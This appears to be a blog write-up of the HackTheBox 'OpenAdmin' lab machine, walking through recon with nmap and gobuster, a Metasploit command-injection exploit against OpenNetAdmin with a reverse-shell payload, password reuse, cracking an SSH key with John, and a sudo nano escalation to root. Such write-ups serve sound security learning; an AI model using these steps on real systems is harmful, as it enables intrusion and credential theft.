Ajdin's blog Tags Github RSS

HackTheBox Openadmin Write Up

2 May 2020

Reconnaissance

Let’s see what have we got here with nmap.

nmap -sC -sV -O -oA nmap/initial 10.10.10.171
-sC: run default script scan
-sV: probe open ports to determine service/version info
-O: OS detection
-oA: output OS detection, version detection, script scanning, and traceroute 

Nmap returns the results quick as it by default scans only for most popular 1000 ports, so lets scan all the ports while we investigate the initial nmap scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.171
-p-: scans from port 1 to 65535, same as -p1-65535

namp initial

Let’s look at the http server.

http server

The page has the default Apache 2 page, so let’s fire up gobuster. 

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.171 -x php,html -t 100
-w: use a wordlist
-u: target url
-x: search for extensions
-t: number of threads to run

gobuster

Owning user

Gobuster found /music, if we take a look we can find a reference to 10.10.10.171/ona. This could also be achieved with dirbuster as it can parse html and search for other links. Gobuster doesn’t offer this functionality but it’s much faster. Let’s enum /ona.

ona

Looks like some sort of a admin panel. Lets inspect further, we see it’s running OpenNetAdmin version 18.1.1, and we can see it’s not the latest version. We can run searchsploit for exploits for OpenNetAdmin.

Exploiting OpenNetAdmin with command injection exploit

searchsploit

So we have a exploit for the exact version which this server is running. We can copy 47772.rb into Metasploit. If you’re importing exploits into Metasploit you should run reload_all in msfconsole after cp the package.

searchsploit -m exploits/php/webapps/47772.rb
cp 47772.rb /usr/share/metasploit-framework/modules/exploits/linux/http/

After the modules have been reloaded we can use the exploit. Make sure to configure everything.

set lhost <your ip, run "ip addr" to find it>
set rhost 10.10.10.171
set payload linux/x64/shell_reverse_tcp

After using this payload we get a shell as www-data. You can see who you are with whoami.

www data shell

Privilege escalation with db password

Now we need to escalate privileges. Let’s see who is using this machine.

users

We have Jimmy and Joanna. Let’s enumerate the directory we are thrown in. You have to chech every folder from here. The key to escalating privileges is finding the ./local/config folder. We have a file with clear text password for the database.

database password

Now we can assume one of the users was sloppy and used the same password for their account. Let’s to to ssh into one of them.

ssh

So we can ssh into Jimmy but it doesn’t contain the user.txt, so joanna is the user which we have to own. Now this is a bit tricky. We have to enumerate again. Directory /var/www seems like a server of some sort.

Wierd server on localhost

main php

So if we can access the server it will output us the ssh private key for joanna. Amazing, but how do we access that? Let’s run netstat

netstat -lt 
-l: listening connections
-t: TCP connections

netstat

So we have an unusual port 52846 listening on localhost. We can curl from ssh as we can’t access this from the browser. 

curl localhost:52846

curl

We’ve got a webpage, let’s access that main.php file from before.

curl

Cracking the hash with John

Now we have the id_rsa key for joanna we have to decrypt it, so we can get the password for the private key. Copy the key on your machine and save it as id_rsa, and copy the ssh2john script so we can use john on this key.

kali@kali:~/openadmin$ cp /usr/share/john/ssh2john.py .

Pipe the output to a file:

kali@kali:~/openadmin$ ./ssh2john.py id_rsa > hash.txt

john

We have the password. bloodninjas, now let’s connect as Joanna.

ssh Joanna

from here we can cat user.txt and we have got the user flag.

joanna@openadmin:~$ cat user.txt
c9b2c...

Getting root

Getting root is fairly easy. Each time you log into an user, try running sudo -l so you can see if something can be ran as root, and exploited to gain a shell. Luckily we do have a command we can run as root.

sudo l

If you encounter any command that can be ran as root you should check out GTFOBins. They can help you break out of an environment. Now run the above mentioned command as root, and get a shell as root. (note: you can also use the file read GTFOBin)

Privilege escalation with Nano

nano

You might get confused as the first few commands will overwrite nano’s interface but just navigate to root.txt

$ whoami 
root
$ cat /root/root.txt
2f907...

This is how I managed to gain root on this box. Hope you learned something through this write up.

nano netstat opennetadmin